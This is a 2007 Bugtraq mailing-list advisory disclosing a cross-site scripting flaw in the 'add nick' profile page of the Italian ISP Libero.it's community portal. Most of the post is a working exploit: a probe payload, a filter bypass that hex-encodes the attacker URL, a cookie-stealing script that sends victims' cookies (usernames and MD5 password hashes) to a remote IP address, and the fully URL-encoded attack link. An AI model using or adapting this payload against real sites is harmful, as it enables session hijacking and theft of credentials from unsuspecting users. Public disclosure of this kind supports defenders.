Libero.it (italian ISP) XSS vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Libero.it (italian ISP) XSS vulnerability
From: rosario.valotta@xxxxxxxxx
Date: 26 Mar 2007 09:32:31 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Libero.it, one of the most important italian ISP (www.libero.it) is affected 
from a XSS vulnerability.
The vulnerability can be found in the "Community" section of Libero portal, and 
the affected functionality is "add nick" ( 
http://digiland.libero.it/profilo.phtml?nick=).
The implementation of this functionality allows the injection of malicious code 
in the URL, so that an attacker can steal username and password of the victim 
accessing his cookie. 

The normal URL would be something linke this:

http://digiland.libero.it/profilo.phtml?nick=mickey

where "mickey" is the name of the nick i'd like to add to mu buddy list.

Trough a simple XSS locator can be found that the page is vulnerable to the XSS 
vector:
http://digiland.libero.it/profilo.phtml?nick=%3cIMG%20SRC=javascript:alert(document.cookie
 )>

The cookie showed contains the victim username and password (used for both the 
Community and the Webmail): the username is stored 
in plain text while the password is hashed with md5 algorithm (most password 
are 5-6 char long and can be decrypted using md5-rainbowtables method) 

A more crafted URL makes possible to automatically post victim cookies to a 
remote server.

A simple parsing of the URL is done by the web application, so that quote and 
double-quote (' and ") chars are escaped by putting a \ before of them (both 
using ASCII and URL encoding).
So it's a bit tricky to pass in the XSS URL the remote server URL and the 
cookie. 
This control can be avoided by constructing the remote server URL from inside 
the web application logic

- the attacker remote base url is encoded using URL encoding and the % char is 
removed: (http://82.53.175.227:8080/sample/hello?c= --> 

687474703A2F2F38322E35332E3137352E3232373A383038302F73616D706C652F68656C6C6F3F633D)

- the following script can be easily attached to the webapp url:


<script>
c=document.cookie;
pcent=/%/.source;
str=/687474703A2F2F38322E35332E3137352E3232373A383038302F73616D706C652F68656C6C6F3F633D/.source;
temp=str.substring(0,0);
for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)}; 
tot=unescape(temp)+c;
document.location.href=tot;
</script>

(on some browser the "eval()" method must be applied on "tot")

- the so composed script is URL encoded and attached to the webapp URL:
http://digiland.libero.it/profilo.phtml?nick=%3C%73%63%72%69%70%74%3E%0D%0A%63%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%0D%0A%70%63%65%6E%74%3D%2F%25%2F%2E%73%6F%75%72%63%65%3B%0D%0A%73%74%72%3D%2F%36%38%37%34%37%34%37%30%33%41%32%46%32%46%33%38%33%32%32%45%33%35%33%33%32%45%33%31%33%37%33%35%32%45%33%32%33%32%33%37%33%41%33%38%33%30%33%38%33%30%32%46%37%33%36%31%36%44%37%30%36%43%36%35%32%46%36%38%36%35%36%43%36%43%36%46%33%46%36%33%33%44%2F%2E%73%6F%75%72%63%65%3B%0D%0A%74%65%6D%70%3D%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%30%29%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%74%72%2E%6C%65%6E%67%74%68%3B%69%2B%3D%32%29%7B%74%65%6D%70%2B%3D%70%63%65%6E%74%2B%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%69%2C%69%2B%32%29%7D%3B%0D%0A%74%6F%74%3D%75%6E%65%73%63%61%70%65%28%74%65%6D%70%29%2B%63%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%74%6F%74%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E
 

 Greetings,
 
Rosario Valotta

Prev by Date: Playstation 3 "Remote Play" Remote DoS Exploit
Next by Date: [USN-441-1] Squid vulnerability
Previous by thread: Playstation 3 "Remote Play" Remote DoS Exploit
Next by thread: [USN-441-1] Squid vulnerability
Index(es):
- Date
- Thread